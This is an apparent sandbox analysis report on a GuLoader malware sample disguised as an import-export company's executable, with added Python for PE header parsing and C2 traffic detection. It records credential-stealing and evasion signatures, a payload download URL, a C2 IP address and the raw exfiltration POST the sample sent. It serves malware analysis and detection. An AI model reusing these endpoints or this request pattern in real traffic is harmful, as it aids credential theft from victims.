Windows Analysis Report KHAWATMI CO.IMPORT & EXPORT.exe

Overview

General Information

Sample Name: KHAWATMI CO.IMPORT & EXPORT.exe
Analysis ID: 458277
MD5: 0153ae8cf4b1f546721332b5cb3f973c
SHA1: 479858ef740172cb3791527a9c9d0da76eec3af4
SHA256: 97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
Tags: exe
Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal PuTTY / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name in the version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

AV Detection:

Found malware configuration
Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}
Multi AV Scanner detection for submitted file
Source: KHAWATMI CO.IMPORT & EXPORT.exe ReversingLabs: Detection: 13%

Compliance:

Uses 32bit PE files
Source: KHAWATMI CO.IMPORT & EXPORT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
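The static PE flags listed above can be verified without a sandbox. The Python below is an added example and is not part of the Joe Sandbox report: it parses the COFF file header of a PE image and decodes the Characteristics bits the report names (RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE). The header bytes it builds are constructed for the example, not taken from the sample. The point an analyst cares about is RELOCS_STRIPPED: an image with no relocation data cannot be rebased, so the loader always maps it at its preferred base and ASLR does not apply to that image (the injected code at 0x03D1xxxx is a separately allocated region and is not covered by this check).

```python
"""Decode IMAGE_FILE_HEADER.Characteristics of a PE image.

Added example; the stub image below is constructed, not the analysed sample.
"""
import struct

# Characteristics bits from the PE/COFF specification (subset).
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
MACHINES = {0x014C: "i386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}

# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes, little-endian).
FILE_HEADER = "<HHIIIHH"


def build_stub(machine=0x014C, characteristics=0x010F):
    """Constructed DOS header + PE signature + COFF file header, no sections.

    0x010F is the combination the report lists for this sample:
    RELOCS_STRIPPED | EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE.
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)  # e_lfanew lives at 0x3C
    coff = struct.pack(FILE_HEADER, machine, 0, 0, 0, 0, 0, characteristics)
    return dos + b"PE\0\0" + coff


def parse_file_header(data):
    """Return (machine name, raw characteristics, decoded flag names)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, _nsec, _ts, _symptr, _nsyms, _optsize, chars = struct.unpack_from(
        FILE_HEADER, data, e_lfanew + 4)
    flags = [name for bit, name in sorted(CHARACTERISTICS.items()) if chars & bit]
    return MACHINES.get(machine, hex(machine)), chars, flags


def assess(data):
    """Turn the raw flags into the facts an analyst wants from the header."""
    machine, chars, flags = parse_file_header(data)
    return {
        "machine": machine,
        "characteristics": hex(chars),
        "flags": flags,
        "is_32bit": machine == "i386" and "32BIT_MACHINE" in flags,
        # Without a relocation table the image cannot be rebased, so the loader
        # must map it at its preferred ImageBase and ASLR cannot apply to it.
        "aslr_possible": "RELOCS_STRIPPED" not in flags,
        "is_dll": "DLL" in flags,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(assess(build_stub()), indent=2))
```

To run it against a real file, replace `build_stub()` with `open(path, "rb").read()`; the parser only touches the DOS header and the 20-byte file header, so a truncated dump is enough as long as those are present.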

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://onedrive.live.com/download?cid=7B0580AA0B18AE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.227.139.18
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected (the same request was seen four times: twice with Content-Length: 190, twice with Content-Length: 163):
    POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.227.139.18
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 976E9D7A
    Content-Length: 190
    Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 185.227.139.18 (42 occurrences)
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: unknown HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0 to Host: 185.227.139.18 (same headers as the request above, Content-Length: 190)
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 03 Aug 2021 06:12:26 GMT
    Server: Apache
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw (decoded from the report's hex dump, which is cut off mid-page; a generic HTML "404 Not Found" body):
    <!DOCTYPE html>
    <html>
        <head>
        <meta http-equiv="Content-type" content="text/html; charset=utf-8">
        <meta http-equiv="Cache-control" content="no-cache">
        <meta http-equiv="Pragma" content="no-cache">
        <meta http-equiv="Expires" content="0">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>404 Not Found</title>
        <style type="text/css">
            body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; }
            section, footer { display: block; padding: 0; margin: 0; }
            .container { margin-left: auto; margin-right: auto; padding: 0 10px; }
            .response-info { [dump truncated in the report]
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp String found in binary or memory: http://crl.microsoft
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg
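The network evidence above has two parts worth turning into detection logic: the payload host onedrive.live.com was resolved through DNS, while the exfiltration host 185.227.139.18 was contacted by bare IP with no DNS query at all, and every request to it was an HTTP/1.0 POST of application/octet-stream with a fixed User-Agent ("Mozilla/4.08 (Charon; Inferno)" mimics a browser string but is not one any browser sends) and a non-standard Content-Key header. The Python below is an added example, not part of the Joe Sandbox report: it correlates a DNS log against a connection log to reproduce the "TCP traffic without corresponding DNS query" signature, and scores raw HTTP requests against the observed header pattern. The event list, its timestamps and the 203.0.113.10 answer for onedrive.live.com are constructed for the example; the POST headers are the ones the report shows.

```python
"""Reproduce two of the report's network signatures over a constructed event log.

Added example; EVENTS is constructed, not captured. The POST request is the one
recorded in the report, the OneDrive GET and all addresses except 185.227.139.18
are made up for the example.
"""
import re
from collections import defaultdict

IPV4 = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

# (timestamp, kind, detail): "dns" -> (name, [answers]); "conn" -> dst ip; "http" -> raw request
EVENTS = [
    (1, "dns", ("onedrive.live.com", ["203.0.113.10"])),   # answer is constructed (TEST-NET-3)
    (2, "conn", "203.0.113.10"),
    (3, "conn", "185.227.139.18"),                          # no DNS answer ever pointed here
    (4, "http", "POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0\r\n"
                "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
                "Host: 185.227.139.18\r\n"
                "Accept: */*\r\n"
                "Content-Type: application/octet-stream\r\n"
                "Content-Encoding: binary\r\n"
                "Content-Key: 976E9D7A\r\n"
                "Content-Length: 190\r\n"
                "Connection: close\r\n\r\n"),
    (5, "conn", "185.227.139.18"),
    (6, "http", "GET /download?cid=7B0580AA0B18AE HTTP/1.1\r\n"   # constructed benign-looking fetch
                "User-Agent: Mozilla/5.0\r\n"
                "Host: onedrive.live.com\r\n\r\n"),
]


def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers-by-lowercase-name)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def score_request(raw):
    """Indicators a request trips; keyed on the header combination, not on the
    per-sample path or Content-Key value. Empty list means nothing matched."""
    method, _path, version, h = parse_request(raw)
    hits = []
    if h.get("user-agent") == "Mozilla/4.08 (Charon; Inferno)":
        hits.append("fixed-ua")
    if "content-key" in h:
        hits.append("content-key-header")
    if (method == "POST" and version == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"):
        hits.append("http10-binary-post")
    if IPV4.fullmatch(h.get("host", "")):
        hits.append("bare-ip-host")
    return hits


def ips_without_dns(events):
    """Destination IPs contacted before any DNS answer resolved to them,
    with the number of such connections (the report's 'without corresponding DNS query')."""
    resolved = set()
    flagged = defaultdict(int)
    for _ts, kind, detail in sorted(events, key=lambda e: e[0]):
        if kind == "dns":
            resolved.update(detail[1])
        elif kind == "conn" and detail not in resolved:
            flagged[detail] += 1
    return dict(flagged)


def triage(events):
    """Combine both checks into one verdict per host / request line."""
    return {
        "no_dns": ips_without_dns(events),
        "http_hits": {raw.split("\r\n", 1)[0]: score_request(raw)
                      for _ts, kind, raw in events if kind == "http"},
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(EVENTS), indent=2))
```

Any one of the four HTTP indicators is weak on its own (bare-IP hosts are common for CDNs and update checks), but the combination of all four on a host that was never resolved through DNS is exactly what the sandbox reported and is a reasonable alert threshold for a proxy or NetFlow pipeline.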

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_004028B8 GetAsyncKeyState, 1_2_004028B8

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B NtWriteVirtualMemory, 1_2_03D1611B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A932 NtWriteVirtualMemory,LoadLibraryA,NtProtectVirtualMemory, 1_2_03D1A932
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D166C6 NtAllocateVirtualMemory, 1_2_03D166C6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D151C1 NtWriteVirtualMemory, 1_2_03D151C1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D145CD NtWriteVirtualMemory, 1_2_03D145CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14DF2 NtWriteVirtualMemory, 1_2_03D14DF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16BFE NtWriteVirtualMemory, 1_2_03D16BFE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D153E5 NtWriteVirtualMemory, 1_2_03D153E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10BEC NtWriteVirtualMemory, 1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16795 NtAllocateVirtualMemory, 1_2_03D16795
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D NtWriteVirtualMemory, 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D157AF NtWriteVirtualMemory, 1_2_03D157AF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14F79 NtWriteVirtualMemory, 1_2_03D14F79
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15B65 NtWriteVirtualMemory, 1_2_03D15B65
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1556D NtWriteVirtualMemory, 1_2_03D1556D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15B03 NtWriteVirtualMemory, 1_2_03D15B03
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14CD1 NtWriteVirtualMemory, 1_2_03D14CD1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D152C9 NtWriteVirtualMemory, 1_2_03D152C9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D158CD NtWriteVirtualMemory, 1_2_03D158CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B4F9 NtWriteVirtualMemory, 1_2_03D1B4F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D126E7 NtWriteVirtualMemory, 1_2_03D126E7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15681 NtWriteVirtualMemory, 1_2_03D15681
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15072 NtWriteVirtualMemory, 1_2_03D15072
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1547B NtWriteVirtualMemory, 1_2_03D1547B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D NtWriteVirtualMemory, 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15A25 NtWriteVirtualMemory, 1_2_03D15A25
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B6B4 LdrInitializeThunk,NtProtectVirtualMemory, 24_2_0056B6B4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B7E6 Sleep,NtProtectVirtualMemory, 24_2_0056B7E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B811 NtProtectVirtualMemory, 24_2_0056B811
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B727 NtProtectVirtualMemory, 24_2_0056B727
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 24_2_0056B6AD LdrInitializeThunk,NtProtectVirtualMemory, 24_2_0056B6AD
Detected potential crypto function
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1ADC1 1_2_03D1ADC1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B3EA 1_2_03D1B3EA
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B 1_2_03D1611B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A932 1_2_03D1A932
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F36 1_2_03D10F36
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D166C6 1_2_03D166C6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10680 1_2_03D10680
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D107D1 1_2_03D107D1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FD4 1_2_03D19FD4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D151C1 1_2_03D151C1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D145CD 1_2_03D145CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1ADCD 1_2_03D1ADCD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B1CF 1_2_03D1B1CF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FCE 1_2_03D19FCE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14DF2 1_2_03D14DF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FF2 1_2_03D19FF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D111F5 1_2_03D111F5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D123F9 1_2_03D123F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D135F9 1_2_03D135F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16BFE 1_2_03D16BFE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D153E5 1_2_03D153E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D163E6 1_2_03D163E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10BEC 1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FEC 1_2_03D19FEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A18A 1_2_03D1A18A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D145B3 1_2_03D145B3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D197B7 1_2_03D197B7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D117A1 1_2_03D117A1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AFA5 1_2_03D1AFA5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D157AF 1_2_03D157AF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D149AE 1_2_03D149AE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F51 1_2_03D10F51
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D13951 1_2_03D13951
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1415D 1_2_03D1415D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11546 1_2_03D11546
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1374E 1_2_03D1374E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F77 1_2_03D10F77
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14F79 1_2_03D14F79
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1317D 1_2_03D1317D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18F7D 1_2_03D18F7D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D12F7E 1_2_03D12F7E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10361 1_2_03D10361
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1556D 1_2_03D1556D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1131A 1_2_03D1131A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1311C 1_2_03D1311C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D12B1E 1_2_03D12B1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15B03 1_2_03D15B03
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11107 1_2_03D11107
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D39 1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19F3A 1_2_03D19F3A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16D27 1_2_03D16D27
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19529 1_2_03D19529
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AF29 1_2_03D1AF29
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1972D 1_2_03D1972D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D14CD1 1_2_03D14CD1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D134D3 1_2_03D134D3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D140DC 1_2_03D140DC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D152C9 1_2_03D152C9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D158CD 1_2_03D158CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B4F9 1_2_03D1B4F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11EE2 1_2_03D11EE2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D108E5 1_2_03D108E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D126E7 1_2_03D126E7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D194E6 1_2_03D194E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B091 1_2_03D1B091
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15681 1_2_03D15681
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B6B4 1_2_03D1B6B4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AEBB 1_2_03D1AEBB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1AE57 1_2_03D1AE57
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1964D 1_2_03D1964D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15072 1_2_03D15072
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19E75 1_2_03D19E75
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1547B 1_2_03D1547B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11665 1_2_03D11665
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1141F 1_2_03D1141F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D16C1E 1_2_03D16C1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1B036 1_2_03D1B036
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18C3C 1_2_03D18C3C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1303F 1_2_03D1303F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D15A25 1_2_03D15A25
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D13827 1_2_03D13827
Sample file name is different from the original file name in the version info
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.603288987.00000000021F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000000.601895516.0000000000424000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029860319.000000001DEC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029835895.000000001DD70000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File created: C:\Users\user\AppData\Local\Temp\~DF7B66B65AC3863AED.TMP
Source: KHAWATMI CO.IMPORT & EXPORT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
